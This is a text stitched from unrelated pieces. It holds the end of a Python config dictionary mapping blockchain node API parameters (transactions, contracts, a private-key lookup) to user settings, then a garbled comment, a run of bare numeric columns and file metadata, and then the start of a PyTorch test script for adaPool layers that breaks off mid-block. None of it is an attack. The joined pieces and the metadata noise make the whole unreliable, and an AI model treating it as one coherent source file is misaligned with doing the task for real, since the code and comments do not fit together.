"z120_GET_CTX_nodeId": ucid.get('my_chainid'),
"z120_GET_CTX_messageBody": ucid.get('my_chainid'),
"z121_GET_CTX_STATE_chainId": ucid.get('my_chainid'),
"z121_GET_CTX_STATE_nodeId": ucid.get('my_chainid'),
"z121_GET_CTX_STATE_messageBody": ucid.get('my_chainid'),
"z122_GET_FRIEND_CHAIN_CIRCULATE_chainId": ucid.get('my_chainid'),
"z122_GET_FRIEND_CHAIN_CIRCULATE_assetIds": ucid.get('my_chainid'),
"z123_GET_LATEST_BLOCKHEADERS_chainId": ucid.get('my_chainid'),
"z123_GET_LATEST_BLOCKHEADERS_size": ucid.get('my_chainid'),
"z124_GET_LATEST_ROUND_BLOCKHEADERS_chainId": ucid.get('my_chainid'),
"z124_GET_LATEST_ROUND_BLOCKHEADERS_round": ucid.get('my_chainid'),
"z125_GET_NONCE_chainId": ucid.get('my_chainid'),
"z125_GET_NONCE_assetChainId": ucid.get('my_chainid'),
"z125_GET_NONCE_assetId": ucid.get('my_chainid'),
"z125_GET_NONCE_address": ucid.get('my_address'),
"z125_GET_NONCE_isConfirmed": ucid.get('my_chainid'),
"z126_GET_OTHERCTX_chainId": ucid.get('my_chainid'),
"z126_GET_OTHERCTX_nodeId": ucid.get('my_chainid'),
"z126_GET_OTHERCTX_messageBody": ucid.get('my_chainid'),
"z128_GET_ROUND_BLOCKHEADERS_chainId": ucid.get('my_chainid'),
"z128_GET_ROUND_BLOCKHEADERS_height": ucid.get('my_chainid'),
"z128_GET_ROUND_BLOCKHEADERS_round": ucid.get('my_chainid'),
"z129_GET_STATUS_chainId": ucid.get('my_chainid'),
"z130_GET_VERSION_chainId": ucid.get('my_chainid'),
"z131_INFO_chainId": ucid.get('my_chainid'),
"z132_LATEST_BLOCK_chainId": ucid.get('my_chainid'),
"z133_LATEST_BLOCKHEADER_chainId": ucid.get('my_chainid'),
"z134_LATEST_BLOCKHEADER_PO_chainId": ucid.get('my_chainid'),
"z135_LATEST_HEIGHT_chainId": ucid.get('my_chainid'),
"z137_MSG_PROCESS_chainId": ucid.get('my_chainid'),
"z137_MSG_PROCESS_nodeId": ucid.get('my_chainid'),
"z137_MSG_PROCESS_cmd": ucid.get('my_chainid'),
"z137_MSG_PROCESS_messageBody": ucid.get('my_chainid'),
"z138_NEW_BLOCK_HEIGHT_chainId": ucid.get('my_chainid'),
"z138_NEW_BLOCK_HEIGHT_height": ucid.get('my_chainid'),
"z139_NW_ACTIVE_CROSS_chainId": ucid.get('my_chainid'),
"z139_NW_ACTIVE_CROSS_maxOut": ucid.get('my_chainid'),
"z139_NW_ACTIVE_CROSS_maxIn": ucid.get('my_chainid'),
"z139_NW_ACTIVE_CROSS_seedIps": ucid.get('my_chainid'),
"z140_NW_ADD_NODES_chainId": ucid.get('my_chainid'),
"z140_NW_ADD_NODES_isCross": ucid.get('my_chainid'),
"z140_NW_ADD_NODES_nodes": ucid.get('my_chainid'),
"z141_NW_BROADCAST_chainId": ucid.get('my_chainid'),
"z141_NW_BROADCAST_excludeNodes": ucid.get('my_chainid'),
"z141_NW_BROADCAST_messageBody": ucid.get('my_chainid'),
"z141_NW_BROADCAST_command": ucid.get('my_chainid'),
"z141_NW_BROADCAST_isCross": ucid.get('my_chainid'),
"z141_NW_BROADCAST_percent": ucid.get('my_chainid'),
"z142_NW_CREATE_NODEGROUP_chainId": ucid.get('my_chainid'),
"z142_NW_CREATE_NODEGROUP_magicNumber": ucid.get('my_chainid'),
"z142_NW_CREATE_NODEGROUP_maxOut": ucid.get('my_chainid'),
"z142_NW_CREATE_NODEGROUP_maxIn": ucid.get('my_chainid'),
"z142_NW_CREATE_NODEGROUP_minAvailableCount": ucid.get('my_chainid'),
"z142_NW_CREATE_NODEGROUP_isCrossGroup": ucid.get('my_chainid'),
"z143_NW_DEL_NODES_chainId": ucid.get('my_chainid'),
"z143_NW_DEL_NODES_nodes": ucid.get('my_chainid'),
"z144_NW_GET_CHAIN_CONNECT_AMOUNT_chainId": ucid.get('my_chainid'),
"z144_NW_GET_CHAIN_CONNECT_AMOUNT_isCross": ucid.get('my_chainid'),
"z145_NW_GET_GROUP_BY_CHAINID_chainId": ucid.get('my_chainid'),
"z146_NW_GET_GROUPS_startPage": ucid.get('my_chainid'),
"z146_NW_GET_GROUPS_pageSize": ucid.get('my_chainid'),
"z147_NW_GET_NODES_chainId": ucid.get('my_chainid'),
"z147_NW_GET_NODES_state": ucid.get('my_chainid'),
"z147_NW_GET_NODES_isCross": ucid.get('my_chainid'),
"z147_NW_GET_NODES_startPage": ucid.get('my_chainid'),
"z147_NW_GET_NODES_pageSize": ucid.get('my_chainid'),
"z149_NW_INFO_chainId": ucid.get('my_chainid'),
"z150_NW_NODES_chainId": ucid.get('my_chainid'),
"z151_NW_PROTOCOL_REGISTER_role": ucid.get('my_chainid'),
"z151_NW_PROTOCOL_REGISTER_protocolCmds": ucid.get('my_chainid'),
"z152_NW_RECONNECT_chainId": ucid.get('my_chainid'),
"z153_NW_SEND_PEERS_MSG_chainId": ucid.get('my_chainid'),
"z153_NW_SEND_PEERS_MSG_nodes": ucid.get('my_chainid'),
"z153_NW_SEND_PEERS_MSG_messageBody": ucid.get('my_chainid'),
"z153_NW_SEND_PEERS_MSG_command": ucid.get('my_chainid'),
"z154_NW_UPDATE_NODE_INFO_chainId": ucid.get('my_chainid'),
"z154_NW_UPDATE_NODE_INFO_nodeId": ucid.get('my_chainid'),
"z154_NW_UPDATE_NODE_INFO_blockHeight": ucid.get('my_chainid'),
"z154_NW_UPDATE_NODE_INFO_blockHash": ucid.get('my_chainid'),
"z155_PARAM_TEST_CMD_intCount": ucid.get('my_chainid'),
"z155_PARAM_TEST_CMD_byteCount": ucid.get('my_chainid'),
"z155_PARAM_TEST_CMD_shortCount": ucid.get('my_chainid'),
"z155_PARAM_TEST_CMD_longCount": ucid.get('my_chainid'),
"z156_PROTOCOL_VERSION_CHANGE_chainId": ucid.get('my_chainid'),
"z156_PROTOCOL_VERSION_CHANGE_protocolVersion": ucid.get('my_chainid'),
"z157_RECEIVE_PACKING_BLOCK_chainId": ucid.get('my_chainid'),
"z157_RECEIVE_PACKING_BLOCK_block": ucid.get('my_chainid'),
"z158_RECV_CIRCULAT_chainId": ucid.get('my_chainid'),
"z158_RECV_CIRCULAT_nodeId": ucid.get('my_chainid'),
"z158_RECV_CIRCULAT_messageBody": ucid.get('my_chainid'),
"z159_RECV_CTX_chainId": ucid.get('my_chainid'),
"z159_RECV_CTX_nodeId": ucid.get('my_chainid'),
"z159_RECV_CTX_messageBody": ucid.get('my_chainid'),
"z160_RECV_CTX_HASH_chainId": ucid.get('my_chainid'),
"z160_RECV_CTX_HASH_nodeId": ucid.get('my_chainid'),
"z160_RECV_CTX_HASH_messageBody": ucid.get('my_chainid'),
"z161_RECV_CTX_SIGN_chainId": ucid.get('my_chainid'),
"z161_RECV_CTX_SIGN_nodeId": ucid.get('my_chainid'),
"z161_RECV_CTX_SIGN_messageBody": ucid.get('my_chainid'),
"z162_RECV_CTX_STATE_chainId": ucid.get('my_chainid'),
"z162_RECV_CTX_STATE_nodeId": ucid.get('my_chainid'),
"z162_RECV_CTX_STATE_messageBody": ucid.get('my_chainid'),
"z163_RECV_OTHER_CTX_chainId": ucid.get('my_chainid'),
"z163_RECV_OTHER_CTX_nodeId": ucid.get('my_chainid'),
"z163_RECV_OTHER_CTX_messageBody": ucid.get('my_chainid'),
"z164_RECV_REGCHAIN_chainId": ucid.get('my_chainid'),
"z164_RECV_REGCHAIN_nodeId": ucid.get('my_chainid'),
"z164_RECV_REGCHAIN_messageBody": ucid.get('my_chainid'),
"z166_REGISTER_PROTOCOL_chainId": ucid.get('my_chainid'),
"z166_REGISTER_PROTOCOL_moduleCode": ucid.get('my_chainid'),
"z166_REGISTER_PROTOCOL_list": ucid.get('my_chainid'),
"z167_ROLLBACK_BLOCK_TXS_chainId": ucid.get('my_chainid'),
"z167_ROLLBACK_BLOCK_TXS_txList": ucid.get('my_chainid'),
"z167_ROLLBACK_BLOCK_TXS_blockHeight": ucid.get('my_chainid'),
"z168_ROLLBACK_UNCONFIRM_TX_chainId": ucid.get('my_chainid'),
"z168_ROLLBACK_UNCONFIRM_TX_tx": ucid.get('my_chainid'),
"z169_ROLLBACK_BLOCK_chainId": ucid.get('my_chainid'),
"z169_ROLLBACK_BLOCK_blockHeader": ucid.get('my_chainid'),
"z170_ROLLBACK_TX_VALIDATE_STATUS_chainId": ucid.get('my_chainid'),
"z170_ROLLBACK_TX_VALIDATE_STATUS_tx": ucid.get('my_chainid'),
"z171_SAVE_BLOCK_chainId": ucid.get('my_chainid'),
"z171_SAVE_BLOCK_blockHeader": ucid.get('my_chainid'),
"z172_SC_BATCH_BEFORE_END_chainId": ucid.get('my_chainid'),
"z172_SC_BATCH_BEFORE_END_blockType": ucid.get('my_chainid'),
"z172_SC_BATCH_BEFORE_END_blockHeight": ucid.get('my_chainid'),
"z173_SC_BATCH_BEGIN_chainId": ucid.get('my_chainid'),
"z173_SC_BATCH_BEGIN_blockType": ucid.get('my_chainid'),
"z173_SC_BATCH_BEGIN_blockHeight": ucid.get('my_chainid'),
"z173_SC_BATCH_BEGIN_blockTime": ucid.get('my_chainid'),
"z173_SC_BATCH_BEGIN_packingAddress": ucid.get('my_address'),
"z173_SC_BATCH_BEGIN_preStateRoot": ucid.get('my_chainid'),
"z174_SC_BATCH_END_chainId": ucid.get('my_chainid'),
"z174_SC_BATCH_END_blockHeight": ucid.get('my_chainid'),
"z175_SC_CALL_chainId": ucid.get('my_chainid'),
"z175_SC_CALL_sender": ucid.get('my_chainid'),
"z175_SC_CALL_password": ucid.get('my_chainid'),
"z175_SC_CALL_value": ucid.get('my_chainid'),
"z175_SC_CALL_gasLimit": ucid.get('my_chainid'),
"z175_SC_CALL_price": ucid.get('my_chainid'),
"z175_SC_CALL_contractAddress": ucid.get('my_address'),
"z175_SC_CALL_methodName": ucid.get('my_chainid'),
"z175_SC_CALL_methodDesc": ucid.get('my_chainid'),
"z175_SC_CALL_args": ucid.get('my_chainid'),
"z175_SC_CALL_remark": ucid.get('my_chainid'),
"z176_SC_CALL_VALIDATOR_chainId": ucid.get('my_chainid'),
"z176_SC_CALL_VALIDATOR_tx": ucid.get('my_chainid'),
"z177_SC_CONSTRUCTOR_chainId": ucid.get('my_chainid'),
"z177_SC_CONSTRUCTOR_contractCode": ucid.get('my_chainid'),
"z178_SC_CONTRACT_INFO_chainId": ucid.get('my_chainid'),
"z178_SC_CONTRACT_INFO_contractAddress": ucid.get('my_address'),
"z179_SC_CONTRACT_OFFLINE_TX_HASH_LIST_chainId": ucid.get('my_chainid'),
"z179_SC_CONTRACT_OFFLINE_TX_HASH_LIST_blockHash": ucid.get('my_chainid'),
"z180_SC_CONTRACT_RESULT_chainId": ucid.get('my_chainid'),
"z180_SC_CONTRACT_RESULT_hash": ucid.get('my_chainid'),
"z181_SC_CONTRACT_RESULT_LIST_chainId": ucid.get('my_chainid'),
"z181_SC_CONTRACT_RESULT_LIST_hashList": ucid.get('my_chainid'),
"z182_SC_CONTRACT_TX_chainId": ucid.get('my_chainid'),
"z182_SC_CONTRACT_TX_hash": ucid.get('my_chainid'),
"z183_SC_CREATE_chainId": ucid.get('my_chainid'),
"z183_SC_CREATE_sender": ucid.get('my_chainid'),
"z183_SC_CREATE_password": ucid.get('my_chainid'),
"z183_SC_CREATE_alias": ucid.get('my_chainid'),
"z183_SC_CREATE_gasLimit": ucid.get('my_chainid'),
"z183_SC_CREATE_price": ucid.get('my_chainid'),
"z183_SC_CREATE_contractCode": ucid.get('my_chainid'),
"z183_SC_CREATE_args": ucid.get('my_chainid'),
"z183_SC_CREATE_remark": ucid.get('my_chainid'),
"z184_SC_CREATE_VALIDATOR_chainId": ucid.get('my_chainid'),
"z184_SC_CREATE_VALIDATOR_tx": ucid.get('my_chainid'),
"z185_SC_DELETE_chainId": ucid.get('my_chainid'),
"z185_SC_DELETE_sender": ucid.get('my_chainid'),
"z185_SC_DELETE_password": ucid.get('my_chainid'),
"z185_SC_DELETE_contractAddress": ucid.get('my_address'),
"z185_SC_DELETE_remark": ucid.get('my_chainid'),
"z186_SC_DELETE_VALIDATOR_chainId": ucid.get('my_chainid'),
"z186_SC_DELETE_VALIDATOR_tx": ucid.get('my_chainid'),
"z187_SC_IMPUTED_CALL_GAS_chainId": ucid.get('my_chainid'),
"z187_SC_IMPUTED_CALL_GAS_sender": ucid.get('my_chainid'),
"z187_SC_IMPUTED_CALL_GAS_value": ucid.get('my_chainid'),
"z187_SC_IMPUTED_CALL_GAS_contractAddress": ucid.get('my_address'),
"z187_SC_IMPUTED_CALL_GAS_methodName": ucid.get('my_chainid'),
"z187_SC_IMPUTED_CALL_GAS_methodDesc": ucid.get('my_chainid'),
"z187_SC_IMPUTED_CALL_GAS_args": ucid.get('my_chainid'),
"z188_SC_IMPUTED_CREATE_GAS_chainId": ucid.get('my_chainid'),
"z188_SC_IMPUTED_CREATE_GAS_sender": ucid.get('my_chainid'),
"z188_SC_IMPUTED_CREATE_GAS_contractCode": ucid.get('my_chainid'),
"z188_SC_IMPUTED_CREATE_GAS_args": ucid.get('my_chainid'),
"z189_SC_INITIAL_ACCOUNT_TOKEN_chainId": ucid.get('my_chainid'),
"z189_SC_INITIAL_ACCOUNT_TOKEN_address": ucid.get('my_address'),
"z190_SC_INVOKE_CONTRACT_chainId": ucid.get('my_chainid'),
"z190_SC_INVOKE_CONTRACT_blockType": ucid.get('my_chainid'),
"z190_SC_INVOKE_CONTRACT_tx": ucid.get('my_chainid'),
"z191_SC_INVOKE_VIEW_chainId": ucid.get('my_chainid'),
"z191_SC_INVOKE_VIEW_contractAddress": ucid.get('my_address'),
"z191_SC_INVOKE_VIEW_methodName": ucid.get('my_chainid'),
"z191_SC_INVOKE_VIEW_methodDesc": ucid.get('my_chainid'),
"z191_SC_INVOKE_VIEW_args": ucid.get('my_chainid'),
"z192_SC_PACKAGE_BATCH_END_chainId": ucid.get('my_chainid'),
"z192_SC_PACKAGE_BATCH_END_blockHeight": ucid.get('my_chainid'),
"z193_SC_TOKEN_ASSETS_LIST_chainId": ucid.get('my_chainid'),
"z193_SC_TOKEN_ASSETS_LIST_address": ucid.get('my_address'),
"z193_SC_TOKEN_ASSETS_LIST_pageNumber": ucid.get('my_chainid'),
"z193_SC_TOKEN_ASSETS_LIST_pageSize": ucid.get('my_chainid'),
"z194_SC_TOKEN_BALANCE_chainId": ucid.get('my_chainid'),
"z194_SC_TOKEN_BALANCE_contractAddress": ucid.get('my_address'),
"z194_SC_TOKEN_BALANCE_address": ucid.get('my_address'),
"z195_SC_TOKEN_TRANSFER_chainId": ucid.get('my_chainid'),
"z195_SC_TOKEN_TRANSFER_address": ucid.get('my_address'),
"z195_SC_TOKEN_TRANSFER_toAddress": ucid.get('my_address'),
"z195_SC_TOKEN_TRANSFER_contractAddress": ucid.get('my_address'),
"z195_SC_TOKEN_TRANSFER_password": ucid.get('my_chainid'),
"z195_SC_TOKEN_TRANSFER_amount": ucid.get('my_chainid'),
"z195_SC_TOKEN_TRANSFER_remark": ucid.get('my_chainid'),
"z196_SC_TOKEN_TRANSFER_LIST_chainId": ucid.get('my_chainid'),
"z196_SC_TOKEN_TRANSFER_LIST_address": ucid.get('my_address'),
"z196_SC_TOKEN_TRANSFER_LIST_pageNumber": ucid.get('my_chainid'),
"z196_SC_TOKEN_TRANSFER_LIST_pageSize": ucid.get('my_chainid'),
"z197_SC_TRANSFER_chainId": ucid.get('my_chainid'),
"z197_SC_TRANSFER_address": ucid.get('my_address'),
"z197_SC_TRANSFER_toAddress": ucid.get('my_address'),
"z197_SC_TRANSFER_password": ucid.get('my_chainid'),
"z197_SC_TRANSFER_amount": ucid.get('my_chainid'),
"z197_SC_TRANSFER_remark": ucid.get('my_chainid'),
"z198_SC_TRIGGER_PAYABLE_FOR_CONSENSUS_CONTRACT_chainId": ucid.get('my_chainid'),
"z198_SC_TRIGGER_PAYABLE_FOR_CONSENSUS_CONTRACT_stateRoot": ucid.get('my_chainid'),
"z198_SC_TRIGGER_PAYABLE_FOR_CONSENSUS_CONTRACT_blockHeight": ucid.get('my_chainid'),
"z198_SC_TRIGGER_PAYABLE_FOR_CONSENSUS_CONTRACT_contractAddress": ucid.get('my_address'),
"z198_SC_TRIGGER_PAYABLE_FOR_CONSENSUS_CONTRACT_tx": ucid.get('my_chainid'),
"z199_SC_UPLOAD_chainId": ucid.get('my_chainid'),
"z199_SC_UPLOAD_jarFileData": ucid.get('my_chainid'),
"z200_SC_VALIDATE_CALL_chainId": ucid.get('my_chainid'),
"z200_SC_VALIDATE_CALL_sender": ucid.get('my_chainid'),
"z200_SC_VALIDATE_CALL_value": ucid.get('my_chainid'),
"z200_SC_VALIDATE_CALL_gasLimit": ucid.get('my_chainid'),
"z200_SC_VALIDATE_CALL_price": ucid.get('my_chainid'),
"z200_SC_VALIDATE_CALL_contractAddress": ucid.get('my_address'),
"z200_SC_VALIDATE_CALL_methodName": ucid.get('my_chainid'),
"z200_SC_VALIDATE_CALL_methodDesc": ucid.get('my_chainid'),
"z200_SC_VALIDATE_CALL_args": ucid.get('my_chainid'),
"z201_SC_VALIDATE_CREATE_chainId": ucid.get('my_chainid'),
"z201_SC_VALIDATE_CREATE_sender": ucid.get('my_chainid'),
"z201_SC_VALIDATE_CREATE_gasLimit": ucid.get('my_chainid'),
"z201_SC_VALIDATE_CREATE_price": ucid.get('my_chainid'),
"z201_SC_VALIDATE_CREATE_contractCode": ucid.get('my_chainid'),
"z201_SC_VALIDATE_CREATE_args": ucid.get('my_chainid'),
"z202_SC_VALIDATE_DELETE_chainId": ucid.get('my_chainid'),
"z202_SC_VALIDATE_DELETE_contractAddress": ucid.get('my_address'),
"z203_STOP_AGENTVALID_chainId": ucid.get('my_chainid'),
"z203_STOP_AGENTVALID_tx": ucid.get('my_chainid'),
"z204_TX_COMMIT_chainId": ucid.get('my_chainid'),
"z204_TX_COMMIT_txList": ucid.get('my_chainid'),
"z204_TX_COMMIT_blockHeader": ucid.get('my_chainid'),
"z205_TX_VALIDATOR_chainId": ucid.get('my_chainid'),
"z205_TX_VALIDATOR_txList": ucid.get('my_chainid'),
"z205_TX_VALIDATOR_blockHeader": ucid.get('my_chainid'),
"z206_TX_BACK_PACKABLE_TXS_chainId": ucid.get('my_chainid'),
"z206_TX_BACK_PACKABLE_TXS_txList": ucid.get('my_chainid'),
"z207_TX_BATCH_VERIFY_chainId": ucid.get('my_chainid'),
"z207_TX_BATCH_VERIFY_txList": ucid.get('my_chainid'),
"z207_TX_BATCH_VERIFY_blockHeader": ucid.get('my_chainid'),
"z207_TX_BATCH_VERIFY_preStateRoot": ucid.get('my_chainid'),
"z208_TX_BL_STATE_chainId": ucid.get('my_chainid'),
"z208_TX_BL_STATE_status": ucid.get('my_chainid'),
"z209_TX_BLOCK_HEIGHT_chainId": ucid.get('my_chainid'),
"z209_TX_BLOCK_HEIGHT_height": ucid.get('my_chainid'),
"z210_TX_CS_STATE_chainId": ucid.get('my_chainid'),
"z210_TX_CS_STATE_packaging": ucid.get('my_chainid'),
"z211_TX_GET_BLOCKTXS_chainId": ucid.get('my_chainid'),
"z211_TX_GET_BLOCKTXS_txHashList": ucid.get('my_chainid'),
"z212_TX_GET_BLOCKTXS_EXTEND_chainId": ucid.get('my_chainid'),
"z212_TX_GET_BLOCKTXS_EXTEND_txHashList": ucid.get('my_chainid'),
"z212_TX_GET_BLOCKTXS_EXTEND_allHits": ucid.get('my_chainid'),
"z213_TX_GET_CONFIRMED_TX_chainId": ucid.get('my_chainid'),
"z213_TX_GET_CONFIRMED_TX_txHash": ucid.get('my_chainid'),
"z214_TX_GET_CONFIRMED_TX_CLIENT_chainId": ucid.get('my_chainid'),
"z214_TX_GET_CONFIRMED_TX_CLIENT_txHash": ucid.get('my_chainid'),
"z215_TX_GET_NONEXISTENT_UNCONFIRMED_HASHS_chainId": ucid.get('my_chainid'),
"z215_TX_GET_NONEXISTENT_UNCONFIRMED_HASHS_txHashList": ucid.get('my_chainid'),
"z216_TX_GET_SYSTEMTYPES_chainId": ucid.get('my_chainid'),
"z217_TX_GET_TX_chainId": ucid.get('my_chainid'),
"z217_TX_GET_TX_txHash": ucid.get('my_chainid'),
"z218_TX_GET_TX_CLIENT_chainId": ucid.get('my_chainid'),
"z218_TX_GET_TX_CLIENT_txHash": ucid.get('my_chainid'),
"z219_TX_NEWTX_chainId": ucid.get('my_chainid'),
"z219_TX_NEWTX_tx": ucid.get('my_chainid'),
"z220_TX_PACKABLE_TXS_chainId": ucid.get('my_chainid'),
"z220_TX_PACKABLE_TXS_endTimestamp": ucid.get('my_chainid'),
"z220_TX_PACKABLE_TXS_maxTxDataSize": ucid.get('my_chainid'),
"z220_TX_PACKABLE_TXS_blockTime": ucid.get('my_chainid'),
"z220_TX_PACKABLE_TXS_packingAddress": ucid.get('my_address'),
"z220_TX_PACKABLE_TXS_preStateRoot": ucid.get('my_chainid'),
"z221_TX_REGISTER_chainId": ucid.get('my_chainid'),
"z221_TX_REGISTER_moduleCode": ucid.get('my_chainid'),
"z221_TX_REGISTER_list": ucid.get('my_chainid'),
"z221_TX_REGISTER_delList": ucid.get('my_chainid'),
"z222_TX_ROLLBACK_chainId": ucid.get('my_chainid'),
"z222_TX_ROLLBACK_txHashList": ucid.get('my_chainid'),
"z222_TX_ROLLBACK_blockHeader": ucid.get('my_chainid'),
"z223_TX_SAVE_chainId": ucid.get('my_chainid'),
"z223_TX_SAVE_txList": ucid.get('my_chainid'),
"z223_TX_SAVE_contractList": ucid.get('my_chainid'),
"z223_TX_SAVE_blockHeader": ucid.get('my_chainid'),
"z224_TX_VERIFY_TX_chainId": ucid.get('my_chainid'),
"z224_TX_VERIFY_TX_tx": ucid.get('my_chainid'),
"z225_UPDATE_CHAIN_ASSET_chainId": ucid.get('my_chainid'),
"z225_UPDATE_CHAIN_ASSET_assets": ucid.get('my_chainid'),
"z226_VERIFY_COINDATA_chainId": ucid.get('my_chainid'),
"z226_VERIFY_COINDATA_tx": ucid.get('my_chainid'),
"z227_VERIFY_COINDATA_BATCH_PACKAGED_chainId": ucid.get('my_chainid'),
"z227_VERIFY_COINDATA_BATCH_PACKAGED_txList": ucid.get('my_chainid'),
"z228_WITHDRAW_VALID_chainId": ucid.get('my_chainid'),
"z228_WITHDRAW_VALID_tx": ucid.get('my_chainid'),
"z1017_AC_GET_PRIKEY_BY_ADDRESS__chainId": ucid.get('my_chainid'),
"z1017_AC_GET_PRIKEY_BY_ADDRESS_address": ucid.get('my_address'),
"z1017_AC_GET_PRIKEY_BY_ADDRESS_password": ucid.get('my_password')
}
# the last above were added after the above numbers (over z1000)
# were created.get(' The consist of 1000 + the
# number that it should have been approximately'
def get_conf_dict(self):
return self.usr_config_ini_d
def get_user_set_dict(self):
return self.user_set_dict
| 68.33515
| 101
| 0.67716
| 6,537
| 50,158
| 4.633471
| 0.086125
| 0.158771
| 0.204134
| 0.311664
| 0.930404
| 0.83291
| 0.717158
| 0.579121
| 0.313216
| 0.110271
| 0
| 0.042897
| 0.197815
| 50,158
| 733
| 102
| 68.428377
| 0.709887
| 0.00626
| 0
| 0
| 0
| 0
| 0.57019
| 0.423629
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004237
| false
| 0.064972
| 0.012712
| 0.002825
| 0.021186
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
63b38e1a7de201e06918463ab69551cbd87972dc
| 20,526
|
py
|
Python
|
pytorch/test-files/test.py
|
alexandrosstergiou/adaPool
|
c933a71a16d8ca86a05bec71fdb0969a7c630109
|
[
"MIT"
] | 33
|
2021-11-03T02:17:03.000Z
|
2022-03-20T03:31:35.000Z
|
pytorch/test-files/test.py
|
alexandrosstergiou/adaPool
|
c933a71a16d8ca86a05bec71fdb0969a7c630109
|
[
"MIT"
] | 8
|
2021-11-15T12:26:58.000Z
|
2022-01-27T15:15:03.000Z
|
pytorch/test-files/test.py
|
alexandrosstergiou/adaPool
|
c933a71a16d8ca86a05bec71fdb0969a7c630109
|
[
"MIT"
] | 6
|
2021-11-08T02:50:52.000Z
|
2022-01-26T11:53:12.000Z
|
import os
os.environ["CUDA_VISIBLE_DEVICES"]="0"
import torch
import adapool_cuda
from adaPool import adapool1d, adapool2d, adapool3d, AdaPool1d, AdaPool2d, AdaPool3d, adaunpool, EDSCWPool1d, EDSCWPool2d, EDSCWPool3d, EMPool1d, EMPool2d, EMPool3d
import timeit
import traceback
import sys
print('\033[\033[38;2;50;50;50;48;2;85;217;192m' + ' = = = Checks for float16 = = = ' + '\033[0m')
x_1d = torch.rand((1, 1, 8), device='cuda:0').half()
beta_1d = (4)
x_2d = torch.rand((1, 1, 8, 8), device='cuda:0').half()
beta_2d = (4,4)
x_3d = torch.rand((1, 1, 8, 8, 8), device='cuda:0').half()
beta_3d = (4,4,4)
print('\033[38;2;77;216;173m' + '--- Performing checks for forward ---' + '\033[0m')
print('\033[38;2;199;246;236m' + '> Checking 1D ...' + '\033[0m')
k=4
s=4
p_1d = AdaPool1d(kernel_size=k, beta=(1), stride=s, return_mask=True, device='cuda:0')
_ ,mask = p_1d(x_1d)
print('kernel size:',k,'stride:',s,'\n mask:',mask[0].data)
p_2d = AdaPool2d(kernel_size=k, beta=(1,1), stride=s, return_mask=True, device='cuda:0')
_ ,mask = p_2d(x_2d)
print('kernel size:',k,'stride:',s,'\n mask:',mask[0].data)
p_3d = AdaPool3d(kernel_size=k, beta=(1,1,1), stride=s, return_mask=True, device='cuda:0')
_ ,mask = p_3d(x_3d)
print('kernel size:',k,'stride:',s,'\n mask:',mask[0].data)
try:
p_1d = AdaPool1d(dtype=x_1d.dtype,device=x_1d.get_device(),beta=beta_1d)
pool_1d = p_1d(x_1d)
p_1d = EDSCWPool1d()
pool_1d = p_1d(x_1d)
p_1d = EMPool1d()
pool_1d = p_1d(x_1d)
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 2D ...' + '\033[0m')
try:
p_2d = AdaPool2d(dtype=x_2d.dtype,device=x_2d.get_device(),beta=beta_2d)
pool_2d = p_2d(x_2d)
p_2d = EDSCWPool2d()
pool_2d = p_2d(x_2d)
p_2d = EMPool2d()
pool_2d = p_2d(x_2d)
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 3D ...' + '\033[0m')
try:
p_3d = AdaPool3d(dtype=x_3d.dtype,device=x_3d.get_device(),beta=beta_3d)
pool_3d = p_3d(x_3d)
p_3d = EDSCWPool3d()
pool_3d = p_3d(x_3d)
p_3d = EMPool3d()
pool_3d = p_3d(x_3d)
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
x_1d.requires_grad = True
x_2d.requires_grad = True
x_3d.requires_grad = True
print('\033[38;2;77;216;173m' + '--- Performing checks for backward ---' + '\033[0m')
print('\033[38;2;199;246;236m' + '> Checking 1D ...' + '\033[0m')
try:
p_1d = AdaPool1d(dtype=x_1d.dtype,device=x_1d.get_device(),beta=beta_1d)
p_1d(x_1d).pow(2).mean().backward()
p_1d = EDSCWPool1d()
p_1d(x_1d).pow(2).mean().backward()
p_1d = EMPool1d()
p_1d(x_1d).pow(2).mean().backward()
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 2D ...' + '\033[0m')
try:
p_2d = AdaPool2d(dtype=x_2d.dtype,device=x_2d.get_device(),beta=beta_2d)
p_2d(x_2d).pow(2).mean().backward()
p_2d = EDSCWPool2d()
p_2d(x_2d).pow(2).mean().backward()
p_2d = EMPool2d()
p_2d(x_2d).pow(2).mean().backward()
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 3D ...' + '\033[0m')
try:
p_3d = AdaPool3d(dtype=x_3d.dtype,device=x_3d.get_device(),beta=beta_3d)
p_3d(x_3d).pow(2).mean().backward()
p_3d = EDSCWPool3d()
p_3d(x_3d).pow(2).mean().backward()
p_3d = EMPool3d()
p_3d(x_3d).pow(2).mean().backward()
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;50;50;50;48;2;85;217;192m' + ' = = = Checks for float32 = = = ' + '\033[0m')
x_1d = torch.rand((4, 16, 56), device='cuda:0').float()
beta_1d = (28)
x_2d = torch.rand((4, 16, 56, 56), device='cuda:0').float()
beta_2d = (28,28)
x_3d = torch.rand((4, 16, 4, 56, 56), device='cuda:0').float()
beta_3d = (2,28,28)
print('\033[38;2;77;216;173m' + '--- Performing checks for forward ---' + '\033[0m')
print('\033[38;2;199;246;236m' + '> Checking 1D ...' + '\033[0m')
try:
p_1d = AdaPool1d(dtype=x_1d.dtype,device=x_1d.get_device(),beta=beta_1d)
pool_1d = p_1d(x_1d)
